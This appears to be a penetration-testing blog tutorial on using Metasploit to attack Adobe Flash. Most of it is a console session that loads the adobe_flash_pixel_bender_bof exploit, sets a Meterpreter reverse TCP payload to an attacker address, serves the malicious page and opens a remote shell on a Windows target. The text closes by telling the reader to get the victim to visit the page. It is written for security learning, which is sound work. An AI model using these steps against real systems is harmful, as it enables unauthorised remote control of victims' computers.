05- Metasploit Basics- Attacking Flash

In 03- Metasploit Basics- Attacking the Browser, we saw how to attack perform attacks against both the Internet Explorer and the Firefox browser, both in Windows and Linux operating systems. Attacks against users using these browsers does not have to be limited to just attacking the browser itself. Most browsers use one or more plugins to handle specialized content. Adobe Flash is a plugin that allows certain kinds of active content to be displayed directly in a browser. It has been subject to a number of attacks, and there are a number of Metasploit modules that target it.

As we saw when attacking the browser, it is critical to know something about the target when selecting an exploit; they are tailored to particular combinations of browser and flash version. Moreover, some modules, especially older modules only work against Windows XP targets. Since that Windows XP is now past its end-of-life, we will not discuss modules that only impact Windows XP. Note that this does not mean that the underlying flaw could not be exploited on other machines, only that the Metasploit module is ineffective against non-XP targets.

If you want to test one or more of these modules, remember that you can get copies of old and out-of-date versions of Adobe Flash directly from Adobe.

Metasploit Modules for Adobe Flash

After looking these over, if you ask me which are my favorites, they are clearly Adobe Flash Player Integer Underflow Remote Code Execution and Adobe Flash Player Shader Buffer Overflow. Both are robust and work on a wider range of modern systems. Add to the fact that they work reliably on a stock Windows 8 system, and I am sold.

Let’s demonstrate one in action:

msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof 
msf exploit(adobe_flash_pixel_bender_bof) > set uripath bob
uripath => bob
msf exploit(adobe_flash_pixel_bender_bof) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 10.0.1.26
lhost => 10.0.1.26
msf exploit(adobe_flash_pixel_bender_bof) > show options

Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     0.0.0.0          yes       The local host to listen on. This 
 must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming 
connections
   SSLCert                      no        Path to a custom SSL certificate 
(default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that 
should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     bob              no        The URI to use for this exploit 
(default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, 
thread, process, none)
   LHOST     10.0.1.26        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(adobe_flash_pixel_bender_bof) > exploit -j
[*] Exploit running as background job.
msf exploit(adobe_flash_pixel_bender_bof) > 
[*] Started reverse handler on 10.0.1.26:4444 
[*] Using URL: http://0.0.0.0:8080/bob
[*]  Local IP: http://10.0.1.26:8080/bob
[*] Server started.

msf exploit(adobe_flash_pixel_bender_bof) > 
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Gathering target 
information.
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Request: /bob/dVUXen/
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Sending HTML...
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Request: /bob/dVUXen
/MFbh.swf
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 10.0.2.2
[*] Meterpreter session 1 opened (10.0.1.26:4444 -> 10.0.2.2:56351) at 
2014-06-04 20:19:29 -0400

msf exploit(adobe_flash_pixel_bender_bof) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter x86/win32  APOLLO\zathras @ APOLLO  10.0.1.26:4444 -> 
10.0.2.2:56351 (10.0.2.8)

msf exploit(adobe_flash_pixel_bender_bof) > 

The process is the same as what we saw for browser attacks. In this case I updated the URI (who would think "bob" would be malicious ☺; besides it is easier to type. I again used a reverse meterpreter shell for the payload, with a listening host IP address of my attack system. Automatic targeting works well for this module. Run the exploit, and get the user to visit the web page. The shell pops quite quickly.

Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: